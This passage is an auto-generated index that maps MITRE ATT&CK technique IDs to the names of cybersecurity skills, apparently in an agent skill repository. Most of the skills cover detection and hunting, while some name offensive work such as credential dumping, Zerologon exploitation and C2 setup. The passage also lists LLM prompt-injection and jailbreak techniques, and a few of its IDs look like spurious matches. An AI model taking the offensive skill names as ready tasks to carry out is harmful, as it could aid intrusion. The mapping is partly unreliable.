 | [T1548.003](https://attack.mitre.org/techniques/T1548/003/) | `detecting-privilege-escalation-attempts`, `detecting-t1548-abuse-elevation-control-mechanism`, `performing-privilege-escalation-assessment`, `performing-privilege-escalation-on-linux` |
 | [T1548.004](https://attack.mitre.org/techniques/T1548/004/) | `detecting-t1548-abuse-elevation-control-mechanism` |
 ---
 ## 🥷 Defense Evasion
 **48 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1027](https://attack.mitre.org/techniques/T1027/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-powershell-empire-artifacts`, `analyzing-powershell-script-block-logging`, `building-attack-pattern-library-from-cti-reports`, `conducting-full-scope-red-team-engagement` +3 more |
 | [T1036](https://attack.mitre.org/techniques/T1036/) | `detecting-evasion-techniques-in-endpoint-logs`, `implementing-mitre-attack-coverage-mapping`, `implementing-siem-use-cases-for-detection`, `performing-purple-team-atomic-testing` |
 | [T1036.005](https://attack.mitre.org/techniques/T1036/005/) | `detecting-process-injection-techniques`, `performing-purple-team-atomic-testing` |
 | [T1055](https://attack.mitre.org/techniques/T1055/) | `building-attack-pattern-library-from-cti-reports`, `building-red-team-c2-infrastructure-with-havoc`, `conducting-full-scope-red-team-engagement`, `detecting-evasion-techniques-in-endpoint-logs`, `detecting-fileless-attacks-on-endpoints` +13 more |
 | [T1055.001](https://attack.mitre.org/techniques/T1055/001/) | `detecting-process-hollowing-technique`, `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon`, `hunting-for-process-injection-techniques`, `performing-purple-team-atomic-testing` +1 more |
 | [T1055.002](https://attack.mitre.org/techniques/T1055/002/) | `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon` |
 | [T1055.003](https://attack.mitre.org/techniques/T1055/003/) | `detecting-process-hollowing-technique`, `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon`, `performing-purple-team-atomic-testing` |
 | [T1055.004](https://attack.mitre.org/techniques/T1055/004/) | `detecting-process-hollowing-technique`, `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon`, `hunting-for-process-injection-techniques` |
 | [T1055.005](https://attack.mitre.org/techniques/T1055/005/) | `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon` |
 | [T1055.008](https://attack.mitre.org/techniques/T1055/008/) | `detecting-process-injection-techniques` |
 | [T1055.009](https://attack.mitre.org/techniques/T1055/009/) | `detecting-process-injection-techniques` |
 | [T1055.011](https://attack.mitre.org/techniques/T1055/011/) | `detecting-process-injection-techniques` |
 | [T1055.012](https://attack.mitre.org/techniques/T1055/012/) | `conducting-malware-incident-response`, `detecting-fileless-malware-techniques`, `detecting-process-hollowing-technique`, `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon` +2 more |
 | [T1055.013](https://attack.mitre.org/techniques/T1055/013/) | `detecting-process-hollowing-technique`, `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon` |
 | [T1055.014](https://attack.mitre.org/techniques/T1055/014/) | `detecting-process-injection-techniques` |
 | [T1055.015](https://attack.mitre.org/techniques/T1055/015/) | `detecting-process-injection-techniques`, `detecting-t1055-process-injection-with-sysmon` |
 | [T1070](https://attack.mitre.org/techniques/T1070/) | `detecting-evasion-techniques-in-endpoint-logs`, `implementing-siem-use-cases-for-detection`, `implementing-velociraptor-for-ir-collection`, `performing-purple-team-atomic-testing` |
 | [T1070.001](https://attack.mitre.org/techniques/T1070/001/) | `detecting-evasion-techniques-in-endpoint-logs`, `implementing-mitre-attack-coverage-mapping`, `performing-purple-team-atomic-testing`, `performing-purple-team-exercise` |
 | [T1070.004](https://attack.mitre.org/techniques/T1070/004/) | `implementing-threat-modeling-with-mitre-attack`, `performing-purple-team-atomic-testing` |
 | [T1070.006](https://attack.mitre.org/techniques/T1070/006/) | `detecting-evasion-techniques-in-endpoint-logs`, `hunting-for-defense-evasion-via-timestomping` |
 | [T1112](https://attack.mitre.org/techniques/T1112/) | `detecting-fileless-malware-techniques`, `performing-purple-team-atomic-testing` |
 | [T1127](https://attack.mitre.org/techniques/T1127/) | `detecting-evasion-techniques-in-endpoint-logs`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-lolbins-execution-in-endpoint-logs` |
 | [T1127.001](https://attack.mitre.org/techniques/T1127/001/) | `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-lolbins-execution-in-endpoint-logs` |
 | [T1140](https://attack.mitre.org/techniques/T1140/) | `analyzing-powershell-script-block-logging`, `detecting-fileless-attacks-on-endpoints`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs` +1 more |
 | [T1202](https://attack.mitre.org/techniques/T1202/) | `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs` |
 | [T1218](https://attack.mitre.org/techniques/T1218/) | `detecting-evasion-techniques-in-endpoint-logs`, `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-advanced-persistent-threats`, `hunting-for-living-off-the-land-binaries` +3 more |
 | [T1218.001](https://attack.mitre.org/techniques/T1218/001/) | `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs`, `performing-purple-team-atomic-testing` |
 | [T1218.002](https://attack.mitre.org/techniques/T1218/002/) | `hunting-for-living-off-the-land-binaries` |
 | [T1218.003](https://attack.mitre.org/techniques/T1218/003/) | `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs`, `performing-purple-team-atomic-testing` |
 | [T1218.004](https://attack.mitre.org/techniques/T1218/004/) | `detecting-living-off-the-land-attacks`, `hunting-for-lolbins-execution-in-endpoint-logs` |
 | [T1218.005](https://attack.mitre.org/techniques/T1218/005/) | `detecting-fileless-malware-techniques`, `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs` +1 more |
 | [T1218.007](https://attack.mitre.org/techniques/T1218/007/) | `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs` |
 | [T1218.010](https://attack.mitre.org/techniques/T1218/010/) | `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs`, `performing-purple-team-atomic-testing` |
 | [T1218.011](https://attack.mitre.org/techniques/T1218/011/) | `detecting-living-off-the-land-attacks`, `detecting-living-off-the-land-with-lolbas`, `hunting-for-living-off-the-land-binaries`, `hunting-for-lolbins-execution-in-endpoint-logs`, `performing-dynamic-analysis-with-any-run` +1 more |
 | [T1218.013](https://attack.mitre.org/techniques/T1218/013/) | `detecting-living-off-the-land-attacks` |
 | [T1222.001](https://attack.mitre.org/techniques/T1222/001/) | `conducting-domain-persistence-with-dcsync` |
 | [T1497](https://attack.mitre.org/techniques/T1497/) | `analyzing-malware-sandbox-evasion-techniques` |
 | [T1497.001](https://attack.mitre.org/techniques/T1497/001/) | `analyzing-malware-sandbox-evasion-techniques` |
 | [T1497.002](https://attack.mitre.org/techniques/T1497/002/) | `analyzing-malware-sandbox-evasion-techniques` |
 | [T1497.003](https://attack.mitre.org/techniques/T1497/003/) | `analyzing-malware-sandbox-evasion-techniques` |
 | [T1550](https://attack.mitre.org/techniques/T1550/) | `performing-lateral-movement-detection` |
 | [T1550.001](https://attack.mitre.org/techniques/T1550/001/) | `detecting-azure-lateral-movement` |
 | [T1550.002](https://attack.mitre.org/techniques/T1550/002/) | `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `conducting-full-scope-red-team-engagement`, `detecting-lateral-movement-in-network`, `detecting-lateral-movement-with-splunk` +6 more |
 | [T1550.003](https://attack.mitre.org/techniques/T1550/003/) | `conducting-pass-the-ticket-attack`, `detecting-pass-the-hash-attacks`, `detecting-pass-the-ticket-attacks`, `exploiting-constrained-delegation-abuse` |
 | [T1550.004](https://attack.mitre.org/techniques/T1550/004/) | `performing-initial-access-with-evilginx3` |
 | [T1562](https://attack.mitre.org/techniques/T1562/) | `detecting-evasion-techniques-in-endpoint-logs`, `performing-purple-team-atomic-testing` |
 | [T1562.001](https://attack.mitre.org/techniques/T1562/001/) | `analyzing-powershell-script-block-logging`, `building-attack-pattern-library-from-cti-reports`, `detecting-evasion-techniques-in-endpoint-logs`, `detecting-fileless-attacks-on-endpoints`, `detecting-suspicious-powershell-execution` +1 more |
 | [T1610](https://attack.mitre.org/techniques/T1610/) | `detecting-container-escape-attempts`, `detecting-container-escape-with-falco-rules` |
 ---
 ## 🔑 Credential Access
 **27 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1003](https://attack.mitre.org/techniques/T1003/) | `analyzing-powershell-script-block-logging`, `building-attack-pattern-library-from-cti-reports`, `building-detection-rules-with-sigma`, `detecting-container-escape-with-falco-rules`, `detecting-credential-dumping-techniques` +10 more |
 | [T1003.001](https://attack.mitre.org/techniques/T1003/001/) | `analyzing-campaign-attribution-evidence`, `analyzing-powershell-script-block-logging`, `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl` +13 more |
 | [T1003.002](https://attack.mitre.org/techniques/T1003/002/) | `detecting-credential-dumping-techniques`, `detecting-t1003-credential-dumping-with-edr`, `performing-purple-team-atomic-testing` |
 | [T1003.003](https://attack.mitre.org/techniques/T1003/003/) | `detecting-credential-dumping-techniques`, `detecting-t1003-credential-dumping-with-edr`, `performing-purple-team-atomic-testing` |
 | [T1003.004](https://attack.mitre.org/techniques/T1003/004/) | `detecting-t1003-credential-dumping-with-edr`, `performing-credential-access-with-lazagne`, `performing-purple-team-atomic-testing` |
 | [T1003.005](https://attack.mitre.org/techniques/T1003/005/) | `detecting-t1003-credential-dumping-with-edr`, `performing-purple-team-atomic-testing` |
 | [T1003.006](https://attack.mitre.org/techniques/T1003/006/) | `analyzing-windows-event-logs-in-splunk`, `conducting-domain-persistence-with-dcsync`, `conducting-full-scope-red-team-engagement`, `conducting-internal-network-penetration-test`, `detecting-dcsync-attack-in-active-directory` +8 more |
 | [T1110](https://attack.mitre.org/techniques/T1110/) | `analyzing-windows-event-logs-in-splunk`, `building-detection-rule-with-splunk-spl`, `conducting-internal-network-penetration-test`, `implementing-mitre-attack-coverage-mapping`, `implementing-siem-use-cases-for-detection` +3 more |
 | [T1110.001](https://attack.mitre.org/techniques/T1110/001/) | `analyzing-windows-event-logs-in-splunk`, `building-detection-rule-with-splunk-spl`, `implementing-siem-use-cases-for-detection`, `performing-false-positive-reduction-in-siem`, `performing-purple-team-atomic-testing` |
 | [T1110.002](https://attack.mitre.org/techniques/T1110/002/) | `exploiting-kerberoasting-with-impacket` |
 | [T1110.003](https://attack.mitre.org/techniques/T1110/003/) | `detecting-pass-the-ticket-attacks`, `implementing-siem-use-cases-for-detection`, `performing-purple-team-atomic-testing` |
 | [T1187](https://attack.mitre.org/techniques/T1187/) | `detecting-ntlm-relay-with-event-correlation` |
 | [T1528](https://attack.mitre.org/techniques/T1528/) | `detecting-azure-lateral-movement`, `detecting-azure-service-principal-abuse` |
 | [T1539](https://attack.mitre.org/techniques/T1539/) | `performing-credential-access-with-lazagne`, `performing-initial-access-with-evilginx3` |
 | [T1552](https://attack.mitre.org/techniques/T1552/) | `performing-cloud-incident-containment-procedures`, `performing-purple-team-atomic-testing` |
 | [T1552.001](https://attack.mitre.org/techniques/T1552/001/) | `performing-credential-access-with-lazagne`, `performing-purple-team-atomic-testing` |
 | [T1552.002](https://attack.mitre.org/techniques/T1552/002/) | `performing-credential-access-with-lazagne` |
 | [T1552.005](https://attack.mitre.org/techniques/T1552/005/) | `conducting-cloud-penetration-testing` |
 | [T1552.006](https://attack.mitre.org/techniques/T1552/006/) | `deploying-active-directory-honeytokens` |
 | [T1557](https://attack.mitre.org/techniques/T1557/) | `performing-initial-access-with-evilginx3` |
 | [T1557.001](https://attack.mitre.org/techniques/T1557/001/) | `conducting-internal-network-penetration-test`, `detecting-ntlm-relay-with-event-correlation`, `hunting-for-ntlm-relay-attacks` |
 | [T1558](https://attack.mitre.org/techniques/T1558/) | `analyzing-windows-event-logs-in-splunk`, `conducting-pass-the-ticket-attack`, `exploiting-kerberoasting-with-impacket`, `exploiting-nopac-cve-2021-42278-42287`, `performing-lateral-movement-detection` +1 more |
 | [T1558.001](https://attack.mitre.org/techniques/T1558/001/) | `analyzing-windows-event-logs-in-splunk`, `conducting-domain-persistence-with-dcsync`, `detecting-golden-ticket-attacks-in-kerberos-logs`, `detecting-golden-ticket-forgery`, `detecting-kerberoasting-attacks` +3 more |
 | [T1558.002](https://attack.mitre.org/techniques/T1558/002/) | `performing-active-directory-compromise-investigation` |
 | [T1558.003](https://attack.mitre.org/techniques/T1558/003/) | `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `conducting-full-scope-red-team-engagement`, `conducting-internal-network-penetration-test`, `deploying-active-directory-honeytokens` +12 more |
 | [T1558.004](https://attack.mitre.org/techniques/T1558/004/) | `detecting-kerberoasting-attacks` |
 | [T1649](https://attack.mitre.org/techniques/T1649/) | `exploiting-active-directory-certificate-services-esc1` |
 ---
 ## 🗺️ Discovery
 **20 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1016](https://attack.mitre.org/techniques/T1016/) | `conducting-full-scope-red-team-engagement`, `conducting-internal-reconnaissance-with-bloodhound-ce`, `exploiting-active-directory-with-bloodhound`, `performing-purple-team-atomic-testing` |
 | [T1018](https://attack.mitre.org/techniques/T1018/) | `conducting-full-scope-red-team-engagement`, `conducting-internal-reconnaissance-with-bloodhound-ce`, `detecting-network-scanning-with-ids-signatures`, `exploiting-active-directory-with-bloodhound`, `performing-active-directory-bloodhound-analysis` |
 | [T1033](https://attack.mitre.org/techniques/T1033/) | `conducting-internal-reconnaissance-with-bloodhound-ce`, `detecting-privilege-escalation-attempts`, `exploiting-active-directory-with-bloodhound`, `performing-purple-team-atomic-testing` |
 | [T1040](https://attack.mitre.org/techniques/T1040/) | `implementing-continuous-security-validation-with-bas` |
 | [T1046](https://attack.mitre.org/techniques/T1046/) | `detecting-network-scanning-with-ids-signatures`, `detecting-privilege-escalation-attempts`, `performing-packet-injection-attack`, `triaging-security-incident` |
 | [T1049](https://attack.mitre.org/techniques/T1049/) | `performing-purple-team-atomic-testing` |
 | [T1057](https://attack.mitre.org/techniques/T1057/) | `performing-purple-team-atomic-testing` |
 | [T1069](https://attack.mitre.org/techniques/T1069/) | `performing-purple-team-atomic-testing` |
 | [T1069.001](https://attack.mitre.org/techniques/T1069/001/) | `performing-active-directory-bloodhound-analysis`, `performing-purple-team-atomic-testing` |
 | [T1069.002](https://attack.mitre.org/techniques/T1069/002/) | `conducting-internal-reconnaissance-with-bloodhound-ce`, `exploiting-active-directory-with-bloodhound`, `performing-active-directory-bloodhound-analysis`, `performing-kerberoasting-attack`, `performing-purple-team-atomic-testing` |
 | [T1082](https://attack.mitre.org/techniques/T1082/) | `conducting-full-scope-red-team-engagement`, `performing-purple-team-atomic-testing` |
 | [T1083](https://attack.mitre.org/techniques/T1083/) | `implementing-canary-tokens-for-network-intrusion`, `performing-purple-team-atomic-testing` |
 | [T1087](https://attack.mitre.org/techniques/T1087/) | `conducting-full-scope-red-team-engagement`, `executing-red-team-engagement-planning`, `implementing-continuous-security-validation-with-bas`, `performing-purple-team-atomic-testing` |
 | [T1087.001](https://attack.mitre.org/techniques/T1087/001/) | `performing-purple-team-atomic-testing` |
 | [T1087.002](https://attack.mitre.org/techniques/T1087/002/) | `conducting-internal-reconnaissance-with-bloodhound-ce`, `deploying-active-directory-honeytokens`, `exploiting-active-directory-certificate-services-esc1`, `exploiting-active-directory-with-bloodhound`, `exploiting-kerberoasting-with-impacket` +3 more |
 | [T1087.004](https://attack.mitre.org/techniques/T1087/004/) | `detecting-azure-service-principal-abuse`, `implementing-mitre-attack-coverage-mapping` |
 | [T1482](https://attack.mitre.org/techniques/T1482/) | `conducting-internal-reconnaissance-with-bloodhound-ce`, `exploiting-active-directory-with-bloodhound`, `performing-active-directory-bloodhound-analysis` |
 | [T1518](https://attack.mitre.org/techniques/T1518/) | `performing-purple-team-atomic-testing` |
 | [T1518.001](https://attack.mitre.org/techniques/T1518/001/) | `performing-purple-team-atomic-testing` |
 | [T1580](https://attack.mitre.org/techniques/T1580/) | `implementing-mitre-attack-coverage-mapping` |
 ---
 ## ↔️ Lateral Movement
 **9 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1021](https://attack.mitre.org/techniques/T1021/) | `detecting-lateral-movement-in-network`, `detecting-lateral-movement-with-splunk`, `detecting-service-account-abuse`, `executing-red-team-engagement-planning`, `exploiting-constrained-delegation-abuse` +10 more |
 | [T1021.001](https://attack.mitre.org/techniques/T1021/001/) | `analyzing-campaign-attribution-evidence`, `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl`, `building-threat-hunt-hypothesis-framework` +8 more |
 | [T1021.002](https://attack.mitre.org/techniques/T1021/002/) | `analyzing-windows-event-logs-in-splunk`, `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl`, `conducting-full-scope-red-team-engagement`, `conducting-internal-network-penetration-test` +10 more |
 | [T1021.003](https://attack.mitre.org/techniques/T1021/003/) | `detecting-lateral-movement-with-splunk`, `hunting-for-dcom-lateral-movement`, `performing-lateral-movement-detection`, `performing-lateral-movement-with-wmiexec`, `performing-purple-team-atomic-testing` |
 | [T1021.004](https://attack.mitre.org/techniques/T1021/004/) | `detecting-lateral-movement-with-splunk`, `performing-purple-team-atomic-testing` |
 | [T1021.006](https://attack.mitre.org/techniques/T1021/006/) | `building-attack-pattern-library-from-cti-reports`, `detecting-lateral-movement-with-splunk`, `performing-lateral-movement-detection`, `performing-purple-team-atomic-testing` |
 | [T1210](https://attack.mitre.org/techniques/T1210/) | `exploiting-ms17-010-eternalblue-vulnerability`, `exploiting-zerologon-vulnerability-cve-2020-1472` |
 | [T1534](https://attack.mitre.org/techniques/T1534/) | `implementing-mitre-attack-coverage-mapping` |
 | [T1570](https://attack.mitre.org/techniques/T1570/) | `detecting-lateral-movement-in-network`, `detecting-lateral-movement-with-splunk`, `performing-lateral-movement-with-wmiexec`, `performing-purple-team-atomic-testing` |
 ---
 ## 📦 Collection
 **13 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1005](https://attack.mitre.org/techniques/T1005/) | `conducting-malware-incident-response`, `detecting-container-escape-with-falco-rules`, `performing-purple-team-atomic-testing` |
 | [T1039](https://attack.mitre.org/techniques/T1039/) | `performing-purple-team-atomic-testing` |
 | [T1074](https://attack.mitre.org/techniques/T1074/) | `building-attack-pattern-library-from-cti-reports`, `executing-red-team-exercise`, `hunting-for-data-staging-before-exfiltration` |
 | [T1074.001](https://attack.mitre.org/techniques/T1074/001/) | `hunting-for-data-staging-before-exfiltration`, `performing-purple-team-atomic-testing` |
 | [T1074.002](https://attack.mitre.org/techniques/T1074/002/) | `hunting-for-data-staging-before-exfiltration` |
 | [T1113](https://attack.mitre.org/techniques/T1113/) | `performing-purple-team-atomic-testing` |
 | [T1114.002](https://attack.mitre.org/techniques/T1114/002/) | `detecting-email-forwarding-rules-attack` |
 | [T1114.003](https://attack.mitre.org/techniques/T1114/003/) | `detecting-business-email-compromise`, `detecting-email-forwarding-rules-attack` |
 | [T1115](https://attack.mitre.org/techniques/T1115/) | `performing-purple-team-atomic-testing` |
 | [T1213](https://attack.mitre.org/techniques/T1213/) | `conducting-full-scope-red-team-engagement` |
 | [T1530](https://attack.mitre.org/techniques/T1530/) | `detecting-insider-threat-behaviors`, `implementing-mitre-attack-coverage-mapping`, `performing-cloud-incident-containment-procedures` |
 | [T1560](https://attack.mitre.org/techniques/T1560/) | `conducting-full-scope-red-team-engagement`, `hunting-for-data-staging-before-exfiltration` |
 | [T1560.001](https://attack.mitre.org/techniques/T1560/001/) | `hunting-for-data-staging-before-exfiltration`, `performing-purple-team-atomic-testing` |
 ---
 ## 📡 Command and Control
 **20 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1071](https://attack.mitre.org/techniques/T1071/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-network-covert-channels-in-malware`, `analyzing-ransomware-network-indicators`, `analyzing-threat-actor-ttps-with-mitre-attack`, `hunting-advanced-persistent-threats` +6 more |
 | [T1071.001](https://attack.mitre.org/techniques/T1071/001/) | `analyzing-apt-group-with-mitre-navigator`, `analyzing-campaign-attribution-evidence`, `analyzing-powershell-empire-artifacts`, `analyzing-powershell-script-block-logging`, `building-attack-pattern-library-from-cti-reports` +13 more |
 | [T1071.004](https://attack.mitre.org/techniques/T1071/004/) | `building-attack-pattern-library-from-cti-reports`, `building-c2-infrastructure-with-sliver-framework`, `hunting-for-beaconing-with-frequency-analysis`, `hunting-for-command-and-control-beaconing`, `hunting-for-dns-tunneling-with-zeek` +3 more |
 | [T1090](https://attack.mitre.org/techniques/T1090/) | `implementing-mitre-attack-coverage-mapping`, `performing-purple-team-atomic-testing` |
 | [T1090.001](https://attack.mitre.org/techniques/T1090/001/) | `performing-purple-team-atomic-testing` |
 | [T1090.002](https://attack.mitre.org/techniques/T1090/002/) | `building-c2-infrastructure-with-sliver-framework`, `building-red-team-c2-infrastructure-with-havoc` |
 | [T1090.004](https://attack.mitre.org/techniques/T1090/004/) | `hunting-for-domain-fronting-c2-traffic` |
 | [T1095](https://attack.mitre.org/techniques/T1095/) | `hunting-for-command-and-control-beaconing`, `hunting-for-unusual-network-connections` |
 | [T1102](https://attack.mitre.org/techniques/T1102/) | `hunting-for-living-off-the-cloud-techniques` |
 | [T1105](https://attack.mitre.org/techniques/T1105/) | `analyzing-powershell-script-block-logging`, `building-attack-pattern-library-from-cti-reports`, `building-c2-infrastructure-with-sliver-framework`, `building-red-team-c2-infrastructure-with-havoc`, `detecting-fileless-attacks-on-endpoints` +7 more |
 | [T1132](https://attack.mitre.org/techniques/T1132/) | `hunting-for-command-and-control-beaconing`, `performing-purple-team-atomic-testing` |
 | [T1132.001](https://attack.mitre.org/techniques/T1132/001/) | `building-c2-infrastructure-with-sliver-framework`, `performing-purple-team-atomic-testing` |
 | [T1219](https://attack.mitre.org/techniques/T1219/) | `performing-purple-team-atomic-testing` |
 | [T1568](https://attack.mitre.org/techniques/T1568/) | `hunting-for-command-and-control-beaconing`, `implementing-mitre-attack-coverage-mapping` |
 | [T1568.002](https://attack.mitre.org/techniques/T1568/002/) | `hunting-for-beaconing-with-frequency-analysis` |
 | [T1571](https://attack.mitre.org/techniques/T1571/) | `hunting-for-unusual-network-connections`, `implementing-mitre-attack-coverage-mapping` |
 | [T1572](https://attack.mitre.org/techniques/T1572/) | `building-c2-infrastructure-with-sliver-framework`, `hunting-for-command-and-control-beaconing`, `hunting-for-dns-tunneling-with-zeek`, `implementing-mitre-attack-coverage-mapping` |
 | [T1573](https://attack.mitre.org/techniques/T1573/) | `analyzing-ransomware-network-indicators`, `hunting-for-beaconing-with-frequency-analysis`, `hunting-for-command-and-control-beaconing`, `implementing-mitre-attack-coverage-mapping`, `performing-purple-team-atomic-testing` |
 | [T1573.001](https://attack.mitre.org/techniques/T1573/001/) | `performing-purple-team-atomic-testing` |
 | [T1573.002](https://attack.mitre.org/techniques/T1573/002/) | `building-c2-infrastructure-with-sliver-framework`, `building-red-team-c2-infrastructure-with-havoc` |
 ---
 ## 📤 Exfiltration
 **12 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1020](https://attack.mitre.org/techniques/T1020/) | `hunting-for-data-exfiltration-indicators` |
 | [T1029](https://attack.mitre.org/techniques/T1029/) | `hunting-for-data-exfiltration-indicators` |
 | [T1030](https://attack.mitre.org/techniques/T1030/) | `hunting-for-data-exfiltration-indicators` |
 | [T1041](https://attack.mitre.org/techniques/T1041/) | `analyzing-campaign-attribution-evidence`, `analyzing-ransomware-network-indicators`, `building-attack-pattern-library-from-cti-reports`, `conducting-full-scope-red-team-engagement`, `conducting-malware-incident-response` +6 more |
 | [T1048](https://attack.mitre.org/techniques/T1048/) | `building-attack-pattern-library-from-cti-reports`, `building-detection-rule-with-splunk-spl`, `conducting-full-scope-red-team-engagement`, `hunting-for-data-exfiltration-indicators`, `implementing-continuous-security-validation-with-bas` +2 more |
 | [T1048.001](https://attack.mitre.org/techniques/T1048/001/) | `hunting-for-data-exfiltration-indicators` |
 | [T1048.002](https://attack.mitre.org/techniques/T1048/002/) | `hunting-for-data-exfiltration-indicators` |
 | [T1048.003](https://attack.mitre.org/techniques/T1048/003/) | `conducting-full-scope-red-team-engagement`, `hunting-for-data-exfiltration-indicators`, `hunting-for-dns-tunneling-with-zeek`, `implementing-continuous-security-validation-with-bas`, `implementing-mitre-attack-coverage-mapping` +2 more |
 | [T1052](https://attack.mitre.org/techniques/T1052/) | `hunting-for-data-exfiltration-indicators` |
 | [T1537](https://attack.mitre.org/techniques/T1537/) | `hunting-for-data-exfiltration-indicators`, `hunting-for-living-off-the-cloud-techniques`, `implementing-mitre-attack-coverage-mapping`, `implementing-threat-modeling-with-mitre-attack`, `performing-cloud-incident-containment-procedures` |
 | [T1567](https://attack.mitre.org/techniques/T1567/) | `detecting-insider-threat-behaviors`, `hunting-for-data-exfiltration-indicators`, `hunting-for-living-off-the-cloud-techniques`, `implementing-continuous-security-validation-with-bas`, `performing-purple-team-atomic-testing` |
 | [T1567.002](https://attack.mitre.org/techniques/T1567/002/) | `hunting-for-data-exfiltration-indicators`, `performing-purple-team-atomic-testing` |
 ---
 ## 💥 Impact
 **6 techniques covered**
 | Technique | Skills |
 |:----------|:-------|
 | [T1485](https://attack.mitre.org/techniques/T1485/) | `hunting-for-shadow-copy-deletion`, `performing-purple-team-atomic-testing` |
 | [T1486](https://attack.mitre.org/techniques/T1486/) | `analyzing-ransomware-network-indicators`, `building-attack-pattern-library-from-cti-reports`, `building-threat-hunt-hypothesis-framework`, `conducting-full-scope-red-team-engagement`, `hunting-for-shadow-copy-deletion` +7 more |
 | [T1489](https://attack.mitre.org/techniques/T1489/) | `conducting-full-scope-red-team-engagement`, `performing-purple-team-atomic-testing` |
 | [T1490](https://attack.mitre.org/techniques/T1490/) | `building-soc-playbook-for-ransomware`, `hunting-for-shadow-copy-deletion`, `performing-purple-team-atomic-testing`, `performing-purple-team-exercise` |
 | [T1491](https://attack.mitre.org/techniques/T1491/) | `performing-purple-team-atomic-testing` |
 | [T1491.002](https://attack.mitre.org/techniques/T1491/002/) | `performing-purple-team-atomic-testing` |
 ---
 ## 🔧 Other / Cross-Tactic Techniques
 | Technique | Skills |
 |:----------|:-------|
 | T0157 | `exploiting-kerberoasting-with-impacket` |
 | T0200 | `building-vulnerability-scanning-workflow`, `performing-authenticated-scan-with-openvas` |
 | T0802 | `detecting-attacks-on-historian-servers` |
 | T0809 | `detecting-attacks-on-historian-servers` |
 | T0814 | `detecting-modbus-command-injection-attacks` |
 | T0816 | `detecting-dnp3-protocol-anomalies` |
 | T0830 | `detecting-modbus-protocol-anomalies` |
 | T0831 | `detecting-modbus-protocol-anomalies` |
 | T0832 | `detecting-attacks-on-historian-servers` |
 | T0833 | `detecting-stuxnet-style-attacks` |
 | T0836 | `detecting-modbus-command-injection-attacks`, `detecting-modbus-protocol-anomalies`, `detecting-stuxnet-style-attacks` |
 | T0839 | `detecting-dnp3-protocol-anomalies`, `detecting-stuxnet-style-attacks` |
 | T0843 | `detecting-modbus-command-injection-attacks`, `performing-s7comm-protocol-security-analysis` |
 | T0847 | `detecting-stuxnet-style-attacks` |
 | T0855 | `detecting-dnp3-protocol-anomalies`, `detecting-modbus-command-injection-attacks`, `detecting-modbus-protocol-anomalies` |
 | T0856 | `detecting-stuxnet-style-attacks` |
 | T0862 | `detecting-stuxnet-style-attacks` |
 | T0866 | `detecting-stuxnet-style-attacks` |
 | T0869 | `detecting-dnp3-protocol-anomalies` |
 | T0881 | `performing-s7comm-protocol-security-analysis` |
 | T0886 | `detecting-modbus-protocol-anomalies` |
 | T1404 | `analyzing-android-malware-with-apktool` |
 | T1417 | `analyzing-android-malware-with-apktool` |
 | T1418 | `analyzing-android-malware-with-apktool` |
 | T1553.006 | `analyzing-uefi-bootkit-persistence` |
 | T1555 | `performing-credential-access-with-lazagne`, `performing-purple-team-atomic-testing` |
 | T1555.003 | `performing-credential-access-with-lazagne`, `performing-purple-team-atomic-testing` |
 | T1555.004 | `performing-credential-access-with-lazagne` |
 | T1578 | `performing-cloud-incident-containment-procedures` |
 | T1582 | `analyzing-android-malware-with-apktool` |
 | T1611 | `detecting-container-escape-attempts`, `detecting-container-escape-with-falco-rules` |
 | T1615 | `conducting-internal-reconnaissance-with-bloodhound-ce`, `exploiting-active-directory-with-bloodhound`, `performing-active-directory-bloodhound-analysis` |
 | T1620 | `detecting-fileless-attacks-on-endpoints` |
 | T5577 | `performing-physical-intrusion-assessment` |
 ---
 ## How This Was Generated
 This coverage map was automatically generated by scanning all 753+ SKILL.md and agent.py files for MITRE ATT&CK technique IDs (pattern: `T####` and `T####.###`). Each technique was mapped to its parent tactic using the [MITRE ATT&CK Enterprise Matrix v16](https://attack.mitre.org/matrices/enterprise/).
 To regenerate: `python3 extract_attack.py`
 ---
 ## MITRE ATLAS Coverage (v5.5.0)
 81 skills mapped to ATLAS adversarial ML techniques.
 Key techniques applied:
 - AML.T0051 — LLM Prompt Injection (Execution)
 - AML.T0054 — LLM Jailbreak (Privilege Escalation)
